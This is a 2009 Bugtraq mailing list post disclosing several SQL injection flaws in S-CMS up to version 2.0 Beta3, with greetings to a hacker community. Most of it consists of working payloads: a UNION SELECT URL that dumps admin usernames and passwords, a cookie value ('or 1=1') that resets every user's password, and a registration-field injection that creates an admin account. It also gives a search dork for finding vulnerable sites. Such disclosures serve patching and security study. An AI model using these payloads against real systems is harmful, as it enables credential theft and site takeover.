Home page logo
/

bugtraq logo Bugtraq mailing list archives

MULTIPLE SQL INJECTION VULNERABILITIES --S-CMS <= v-2.0 Beta3-->
From: y3nh4ck3r () gmail com
Date: Tue, 9 Jun 2009 11:32:28 -0600

-----------------------------------------------------------------
MULTIPLE SQL INJECTION VULNERABILITIES --S-CMS <= v-2.0 Beta3-->
-----------------------------------------------------------------

CMS INFORMATION:

-->WEB: http://www.matteoiammarrone.com/public/s-cms/
-->DOWNLOAD: http://www.matteoiammarrone.com/public/s-cms/
-->DEMO: N/A
-->CATEGORY: CMS / Portal
-->DESCRIPTION: Cms written in php and mysql, phpnuke style whit a plugins,
                blocks and permission system.
-->RELEASED: 2009-05-25

CMS VULNERABILITY:

-->TESTED ON: firefox 3
-->DORK: "S-CMS by matteoiamma"
-->CATEGORY: SQL INJECTION/INSECURE COOKIE HANDLING (SQLi)/ADD NEW ADMIN (SQLi)
-->AFFECT VERSION: <= 2.0-Beta3
-->Discovered Bug date: 2009-05-25
-->Reported Bug date: 2009-05-25
-->Fixed bug date: 2009-05-28
-->Info patch(2.1): http://www.matteoiammarrone.com/public/s-cms/plugin.php?page=phpbb3
-->Author: YEnH4ckEr
-->mail: y3nh4ck3r[at]gmail[dot]com
-->WEB/BLOG: N/A
-->COMMENT: A mi novia Marijose...hermano,cunyada, padres (y amigos xD) por su apoyo.
-->EXTRA-COMMENT: Gracias por aguantarme a todos! (Te kiero xikitiya!)



#########################
////////////////////////

SQL INJECTION (SQLi):

////////////////////////
#########################


-------------------
PROOF OF CONCEPT:
-------------------


<<<<---------++++++++++++++ Condition: magic quotes=OFF +++++++++++++++++--------->>>>

<<<<---------++++++++++++++ Condition: {db_prefix} by default: cms +++++++++++++++++--------->>>>


[++] GET var --> 'username'

[++] File vuln --> 'profile.php'


~~~~~> 
http://[HOST]/[PATH]/plugin.php?page=your_account&mode=viewprofile&username=-1%27+UNION+ALL+SELECT+1,user(),3,version(),database(),user(),7,8,current_user(),10,11,version(),13,14,15,version(),17,version(),user(),20,21,22%23


[++[Return]++] ~~~~~> user or version in DB.


----------
EXPLOIT:
----------


~~~~~> 
http://[HOST]/[PATH]/plugin.php?page=your_account&mode=viewprofile&username=-1%27+UNION+ALL+SELECT+1,username,3,concat(username,0x3A3A3A,password),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22+FROM+cms_users+WHERE+uid=1%23


[++[Return]++] ~~~~~> username:::password in '{db_prefix}_users' table



##################################
/////////////////////////////////

INSECURE COOKIE HANDLING (SQLi):

/////////////////////////////////
##################################



<<<<---------++++++++++++++ Condition: magic quotes=OFF +++++++++++++++++--------->>>>

<<<<---------++++++++++++++ Condition: Be registered user +++++++++++++++++--------->>>>


Being other user we can change passwords of all users and set our password for them.


----------
EXPLOIT:
----------


Change 'username' cookie.


~~~~~> username=[your_real_user]' or 1=1%23 



[++[Return]++] ~~~~~> Set our password for all users.



#######################
//////////////////////

ADD NEW ADMIN (SQLi):

/////////////////////
######################



<<<<---------++++++++++++++ Condition: magic quotes=OFF +++++++++++++++++--------->>>>



Go to register page ~~~~~> http://[HOST]/[PATH]/plugin.php?page=your_account.php&mode=register


----------
EXPLOIT:
----------


Set username.


~~~~~> username=y3nh4ck3r',MD5('y3nh4ck3r'), '', '', '', '', 'offline', 'y3nh4ck3r () gmail com', '01.gif', '', '', '', 
'1', '', '', 'ip', 'lang-english.php', 'lightstorm', '', 'admin', '0')/*



[++[Return]++] ~~~~~> Create new admin with username/password= y3nh4ck3r/y3nh4ck3r



#######################################################################
#######################################################################
##*******************************************************************##
##  SPECIAL GREETZ TO: Str0ke, JosS, Ulises2k, J. McCray, Evil1 ...  ##
##*******************************************************************##
##-------------------------------------------------------------------##
##*******************************************************************##
##              GREETZ TO: SPANISH H4ck3Rs community!                ##
##*******************************************************************##
#######################################################################
#######################################################################


  By Date           By Thread  

Current thread:
  • MULTIPLE SQL INJECTION VULNERABILITIES --S-CMS <= v-2.0 Beta3--> y3nh4ck3r (Jun 09)
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]
AlienVault